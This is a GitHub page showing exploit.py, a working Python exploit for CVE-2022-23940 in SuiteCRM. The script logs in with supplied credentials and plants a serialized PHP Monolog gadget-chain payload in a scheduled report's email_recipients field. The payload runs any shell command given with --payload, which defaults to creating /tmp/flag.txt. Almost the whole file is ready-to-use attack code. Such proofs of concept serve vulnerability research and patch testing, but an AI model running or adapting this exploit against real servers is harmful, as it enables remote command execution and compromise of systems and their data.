-
Notifications
You must be signed in to change notification settings - Fork 6
/
Copy pathexploit.py
executable file
·92 lines (76 loc) · 3.84 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
#!/usr/bin/env python3
import re
import click
import logging
import requests
from base64 import b64encode
# Credits to https://github.com/ambionics/phpggc (Monolog/RCE2 payload)
payload_template_start = b'a:2:{i:7;O:32:"Monolog\\Handler\\SyslogUdpHandler":1:{s:6:"socket";O:29:"Monolog\\Handler\\BufferHandler":7:{s:10:"\x00*\x00handler";O:29:"Monolog\\Handler\\BufferHandler":7:{s:10:"\x00*\x00handler";N;s:13:"\x00*\x00bufferSize";i:-1;s:9:"\x00*\x00buffer";a:1:{i:0;a:2:{i:0;'
payload_template_second = b';s:5:"level";N;}}s:8:"\x00*\x00level";N;s:14:"\x00*\x00initialized";b:1;s:14:"\x00*\x00bufferLimit";i:-1;s:13:"\x00*\x00processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}s:13:"\x00*\x00bufferSize";i:-1;s:9:"\x00*\x00buffer";a:1:{i:0;a:2:{i:0;'
payload_template_third = b';s:5:"level";N;}}s:8:"\x00*\x00level";N;s:14:"\x00*\x00initialized";b:1;s:14:"\x00*\x00bufferLimit";i:-1;s:13:"\x00*\x00processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}}i:7;i:7;}'
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger("CVE-2022-23940")
@click.command("CVE-2022-23940",
epilog="https://github.com/manuelz120/CVE-2022-23940")
@click.option(
"--host",
'-h',
default="http://localhost",
help="Root of SuiteCRM installation. Defaults to http://localhost")
@click.option("--username", '-u', prompt="Username> ", help="Username")
@click.option("--password",
'-p',
prompt="Password> ",
help="password",
hide_input=True)
@click.option("--payload",
'-P',
help="Shell command to be executed on target system",
default='touch /tmp/flag.txt')
@click.option("--is_core",
'-d',
default=False,
help="SuiteCRM Core (>= 8.0.0). Defaults to False")
def main(host: str, username: str, password: str, payload: str, is_core: bool):
host = f"{host}/legacy" if is_core else host
session = requests.Session()
login_response = session.post(f'{host}/index.php',
data={
"module": "Users",
"action": "Authenticate",
"user_name": username,
"username_password": password,
})
if "&action=Login" in login_response.url:
logger.error(
"Login didn't work. Are you sure you specified the correct parameters?"
)
exit(-1)
logger.info(f"Login did work - Trying to create scheduled report")
command_payload = f"s:{len(payload)}:\"{payload}\"".encode()
payload = payload_template_start + command_payload + payload_template_second + command_payload + payload_template_third
payload = b64encode(payload)
response = session.post(f'{host}/index.php',
data={
"module": "AOR_Scheduled_Reports",
"action": "Save",
"name": "test",
"status": "active",
"schedule_type": "monthly",
"email_recipients": payload
},
headers={
'Referer': host,
"content-type":
"application/x-www-form-urlencoded"
})
record_id_regex = re.compile(r"record_id='([^[']+)'", re.MULTILINE)
record_id = record_id_regex.findall(response.text).pop()
if not record_id:
logger.error("Failed to create scheduled report")
exit(-1)
logger.info(
f"Succesfully created scheduled report with id {record_id}. Enjoy your command execution :)"
)
if __name__ == "__main__":
main()